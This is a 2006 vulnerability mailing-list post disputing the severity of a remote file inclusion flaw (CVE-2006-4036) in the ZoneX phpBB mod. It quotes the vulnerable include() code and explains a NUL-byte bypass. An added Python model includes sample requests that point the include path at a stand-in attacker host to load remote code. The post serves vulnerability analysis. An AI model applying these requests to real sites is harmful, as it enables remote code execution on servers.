[VIM] ZoneX 1.0.3 File Inclusion - CVE-2006-4036

Heinbockel, Bill heinbockel at mitre.org
Wed Sep 6 11:33:52 EDT 2006


In a BUGTRAQ post by maric_sasa:
Re: ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion Vulnerability
http://www.securityfocus.com/archive/1/archive/1/444901/100/0/threaded

"This vulnerability is not that dangerous because, firstly, if you want
to exploit it, you must have exact file tree and correct name of the
malicious script because that variable is never used alone but always
in concatenation with script name and generic extension and, secondly,
if site has register_globals set to OFF, you cannot use this exploit at
all..."

There appears to be a dispute as to the severity of the issue. Looking into
the source code of the includes/usercp_register.php file (lines 43-49):

> include($phpbb_root_path . 'newsletter/scripts/subscriptions.' .$phpEx);
> include($phpbb_root_path . 'contests/vote_contest/vote_contest_agreement.' .$phpEx);
> if ( !defined('IN_PHPBB') )
> {
>     die("Hacking attempt");
>     exit;
> }

Whoops! The IN_PHPBB check comes too late: both include() statements run
before it, so the check protects nothing, and the phpbb_root_path variable
is still attacker-controlled whenever register_globals is on. The poster is
also apparently not aware that a NULL byte (%00) can be appended to the
phpbb_root_path parameter in order to avoid the "script name and generic
extension": PHP of that era (every version before 5.3.4) truncates an
include() path at the first NUL, so the attacker needs neither the exact
file tree nor a matching script name, only one reachable file.
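To make the two objections concrete, here is an added model (not code from ZoneX, phpBB or the original poster) of how the quoted lines resolve their include() targets. It assumes register_globals=On and a PHP build that still truncates paths at a NUL byte (anything before 5.3.4); remote inclusion additionally needs allow_url_fopen, which was the default at the time. The attacker host and request strings are constructed for the example.

```python
"""Model of the include() resolution in the quoted usercp_register.php lines.

Added illustration, not code from the ZoneX/phpBB mod.  It shows why an
attacker does not need to mirror the expected file tree: a %00 in the
phpbb_root_path parameter discards the suffix PHP appends.
"""
from urllib.parse import parse_qs

# Fixed suffixes copied from the two include() calls in the quoted snippet.
INCLUDE_SUFFIXES = (
    "newsletter/scripts/subscriptions.",
    "contests/vote_contest/vote_contest_agreement.",
)
PHP_EXT = "php"  # $phpEx in phpBB 2


def php_include_target(path: str, nul_truncates: bool = True) -> str:
    """Return the file name PHP actually tries to open for include($path).

    Before PHP 5.3.4 the path reached the C-level open() as a NUL-terminated
    string, so everything after the first "\\0" was silently dropped.
    """
    if nul_truncates and "\x00" in path:
        return path.split("\x00", 1)[0]
    return path


def includes_before_check(query_string: str, register_globals: bool = True,
                          nul_truncates: bool = True) -> list:
    """Simulate the quoted lines: both include()s run before the IN_PHPBB check.

    With register_globals=On the request parameter becomes $phpbb_root_path
    and is used twice before die("Hacking attempt") is ever reached.
    Returns the resolved include targets, or [] if the parameter cannot
    reach the script at all (maric_sasa's register_globals=Off case).
    """
    if not register_globals:
        return []
    params = parse_qs(query_string, keep_blank_values=True)  # decodes %00 -> "\x00"
    root = params.get("phpbb_root_path", [None])[0]
    if root is None:
        return []
    targets = []
    for suffix in INCLUDE_SUFFIXES:
        raw = root + suffix + PHP_EXT  # $phpbb_root_path . '...' . $phpEx
        targets.append(php_include_target(raw, nul_truncates))
    return targets


def demo():
    """Contrast the 'exact file tree' objection with the NUL-byte bypass."""
    # Without %00 the attacker must host the exact tree and file names.
    mirrored = includes_before_check("phpbb_root_path=http://attacker.example/")
    # With %00 the appended script name and extension are discarded,
    # so a single file of any name is enough (hypothetical attacker host).
    truncated = includes_before_check(
        "phpbb_root_path=http://attacker.example/x.txt%00")
    return mirrored, truncated


if __name__ == "__main__":
    mirrored, truncated = demo()
    print("without %00:", mirrored)
    print("with %00:   ", truncated)
```

Passing `nul_truncates=False` models a PHP build with the 5.3.4 fix, where the NUL stays in the path and the open fails; the `register_globals=False` path is the poster's second objection, which is correct as far as it goes.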

Nothing to see here, move along...


William Heinbockel
Infosec Engineer
The MITRE Corporation
202 Burlington Rd. MS S145
Bedford, MA 01730
heinbockel at mitre.org
781-271-2615

